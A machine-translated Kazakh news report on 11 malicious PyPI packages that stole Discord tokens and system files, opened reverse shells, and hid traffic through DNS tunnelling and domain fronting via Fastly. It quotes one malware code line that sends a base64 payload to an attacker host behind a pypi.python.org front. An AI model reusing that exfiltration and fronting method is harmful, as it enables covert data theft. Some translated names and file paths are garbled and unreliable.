PYPI (Python пакет индексі) анықтамалығында зиянды код бар 11 пакет анықталды. Проблемалар анықталғанға дейін пакеттер шамамен 38 мың рет жүктелді. Анықталған зиянды бумалар шабуылдаушылардың серверлерімен байланыс арналарын жасыру үшін күрделі әдістерді қолдану үшін ерекшеленеді.
- маңызды пакет (6305 жүктеп алу), маңызды-пакет (12897) - жүйеге қабықша қолжетімділікті (кері қабық) қамтамасыз ету үшін pypi.python.org сайтына қосылу желеуімен сыртқы серверге қосылым орнатты және ақпаратты жасыру үшін trevorc2 бағдарламасын пайдаланды. байланыс арнасы.
- pptest (10001), ipboards (946) - жүйе туралы ақпаратты беру үшін DNS байланыс арнасы ретінде пайдаланылады (бірінші пакетте хост атауы, жұмыс каталогы, ішкі және сыртқы IP, екіншісінде - пайдаланушы аты мен хост атауы) .
- Owlmoon (3285), Discordsafety (557), YiffParty (1859) - жүйеде Discord қызметіне арналған таңбалауышты анықтап, оны сыртқы хостқа жіберді.
- TRRRFAB (287) - идентификатор, хост атауы және etc / etc / passwd, / etc / hods / хосттар, / үйді сыртқы хостқа жіберді.
- 10Цент10 (490) - сыртқы хостпен кері қабық байланыс орнатылды.
- yandex-yt (4183) - жүйенің бұзылғаны және nda.ya.ru (api.ya.cc) арқылы берілген әрі қарайғы әрекеттер туралы қосымша ақпараты бар бетке қайта бағытталуы туралы хабарламаны көрсетеді.
Белсенділігін жасыру үшін PyPI каталогында пайдаланылатын Fastly мазмұнды жеткізу желісін пайдаланатын маңызды бума мен маңызды бума бумаларында пайдаланылатын сыртқы хосттарға қол жеткізу әдісі ерекше назар аударады. Шын мәнінде, сұраулар pypi.python.org серверіне жіберілді (HTTPS сұрауының ішіндегі SNI-де python.org атауын көрсетуді қоса), бірақ HTTP «Хост» тақырыбы шабуылдаушылар басқаратын сервердің атауын қамтиды (сек. Алға.io. Global.Prod.pry.pry.net). Мазмұнды жеткізу желісі деректерді жіберу кезінде pypi.python.org сайтына TLS қосылымының параметрлерін пайдаланып шабуылдаушы серверге ұқсас сұрау жіберді.
PyPI инфрақұрылымы Fastly мазмұн жеткізу желісімен жұмыс істейді, ол жалпы сұраныстарды кэштеу үшін мөлдір Varnish проксиін пайдаланады және HTTPS сұраныстарын прокси арқылы бағыттау үшін соңғы нүкте серверлерінде емес, CDN деңгейінде TLS сертификаттарын өңдейді. Мақсатты хостқа қарамастан, сұраныстар проксиге бағытталады, ол "Host" HTTP тақырыбын пайдаланып қажетті хостты анықтайды. домен атаулары Хосттар барлық Fastly клиенттеріне ортақ CDN жүктеме теңгергішінің IP мекенжайларымен салыстырылады.
Шабуылдаушының сервері Fastly CDN-де тіркеледі, ол кез келген адамға тегін жоспарлар ұсынады және тіпті анонимді тіркеуге мүмкіндік береді. Атап айтқанда, кері қабықша жәбірленушіге сұраныстар жіберу үшін де қолданылады, бірақ шабуылдаушының хостынан басталады. Сырттан қарағанда, шабуылдаушының серверімен өзара әрекеттесу PyPI каталогымен шифрланған заңды сеанстар болып көрінеді. TLS сертификаты PyPI. «Домендік фронтинг» деп аталатын ұқсас әдіс бұрын бұғаттауды айналып өткен кезде хост атауларын жасыру үшін кеңінен қолданылған. Бұл әдіс кейбір CDN ұсынатын HTTPS қатынау мүмкіндігін пайдаланады, SNI-де жалған хост атауын көрсетеді және сұралған хост атауын TLS сессиясы ішінде HTTP Host тақырыбында жібереді.
Зиянды әрекетті жасыру үшін, Trevorc2 пакеті қосымша веб-шарлауға ұқсас сервермен өзара әрекеттесу үшін қолданылды, мысалы, «https://pypi.python.org/images» кескіні арқылы жіберілді. guid=” guid параметрінде ақпаратты кодтаумен. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, тақырыптар = {'Хост': "psec.forward.io.global.prod.fastly.net"})
Pptest және ipboards пакеттері DNS серверіне сұраулардағы пайдалы ақпаратты кодтауға негізделген желілік белсенділікті жасыру үшін басқа тәсілді пайдаланды. Зиянды бағдарламалық құрал ақпаратты «nu4timjagq4fimbuhe.example.com» сияқты DNS сұрауларын орындау арқылы жібереді, онда басқару серверіне жіберілген деректер ішкі домен атауында base64 пішімі арқылы кодталған. Шабуылшы бұл хабарламаларды Experty.com доменіне DNS серверін басқару арқылы қабылдайды.
Ақпарат көзі: opennet.ru
